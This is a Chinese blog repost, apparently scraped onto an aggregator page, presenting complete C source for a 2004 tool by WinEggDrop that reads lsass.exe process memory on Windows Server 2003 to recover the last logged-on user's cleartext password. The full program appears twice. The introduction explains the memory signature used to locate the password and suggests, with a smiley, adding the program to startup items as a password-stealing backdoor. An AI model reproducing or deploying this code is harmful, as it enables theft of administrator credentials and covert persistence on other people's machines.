获取windows2003系统管理员密码
来源:互联网 发布:牙医自己种牙 知乎 编辑:程序博客网 时间:2024/04/30 04:23
其实这个方法比较早就发现了,在参加安全焦点峰会之前我写的那一篇关于从内存中抓取密码一文中提到了这个(后来冰哥给面子,做为了备选议题)。当时也是很无心,发现在lsass进程中存放着最近一次登陆的管理员的密码,而且是明文的。不过在其他系统上并没有找到,所以当时也没有发表出来。今天看到 WinEggDrop贴出了代码,写的非常完整,转了过来,大家看看吧。
这里面有一点要注意,首先保存的密码是最近一次登陆的用户的密码,相对于“LocalSystem Remote Procedure Call (RPC)"的一定偏移处,WinEggDrop兄弟从这后面找到“02 00 00 00 00 00 00",然后之后的UNICODE数据就是明文的密码。在lsass进程中通常有两个地方有”LocalSystem Remote Procedure Call (RPC)“。但是密码只有第一处有。
其次,如果想做为一个偷密码的后门的话,就做个程序加入到启动项,在执行时肯定就是当前登陆用户的密码, ^_^
再次感谢WinEggDrop兄:
//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
char Password[MAX_PATH] = {0}; // Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop/n/n");
if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform/n");
return -1;
}
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer[i] == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot/n");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = {0};
DWORD ByteGet = 0;
int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process/n");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory/n");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> /"%s/"/n",Found + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password/n");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
给大家一个明确一点的图片参考,其中红色部分就是明文密码(该图是在winhex中截取的)。。。。
这里面有一点要注意,首先保存的密码是最近一次登陆的用户的密码,相对于“LocalSystem Remote Procedure Call (RPC)"的一定偏移处,WinEggDrop兄弟从这后面找到“02 00 00 00 00 00 00",然后之后的UNICODE数据就是明文的密码。在lsass进程中通常有两个地方有”LocalSystem Remote Procedure Call (RPC)“。但是密码只有第一处有。
其次,如果想做为一个偷密码的后门的话,就做个程序加入到启动项,在执行时肯定就是当前登陆用户的密码, ^_^
再次感谢WinEggDrop兄:
//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
char Password[MAX_PATH] = {0}; // Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop/n/n");
if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform/n");
return -1;
}
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer[i] == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot/n");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = {0};
DWORD ByteGet = 0;
int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process/n");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory/n");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> /"%s/"/n",Found + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password/n");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
给大家一个明确一点的图片参考,其中红色部分就是明文密码(该图是在winhex中截取的)。。。。
- 获取windows2003系统管理员密码
- 获取windows2003系统管理员密码
- windows下获取系统管理员账号明文密码工具mimikatz使用
- 破解PUBWIN4系统管理员密码
- windows系统管理员密码破解
- 系统管理员修改密码
- 修改Oracle系统管理员密码
- 破解Windows2003密码
- 远程修改Windows2003密码
- Windows2003密码忘记
- 获取系统管理员权限
- Oracle系统管理员密码忘记解决办法
- Oracle 系统管理员密码忘记解决办法
- SAP中破解系统管理员密码
- VC开发数据库系统管理员密码修改模块
- 验证和更改 MSDE 系统管理员密码
- 关于Windows系统管理员密码丢失的还原
- VC开发数据库系统管理员密码修改模块
- 工欲善,必先利其器 -- (使用开源工具提高J2EE系统的质量)
- BASIC ROOTKIT that hides files, directories, and processes
- 用户态隐藏进程的通用版本
- 磕瓜子的理论
- 第一
- 获取windows2003系统管理员密码
- QQ2004 sp1加密文件结构和加密算法分析
- 关于HOOK截获中文输入
- Winamp "in_cdda" 模块的调试以及SHELLCODE的编写
- Process-wide API spying - an ultimate hack
- 常用函数库收集
- 在Win2000下用PHP和JSP连接MySQL
- SQL Server补丁版本的检查和安装过程中常见问题
- 一些初学都常用的ASP代码
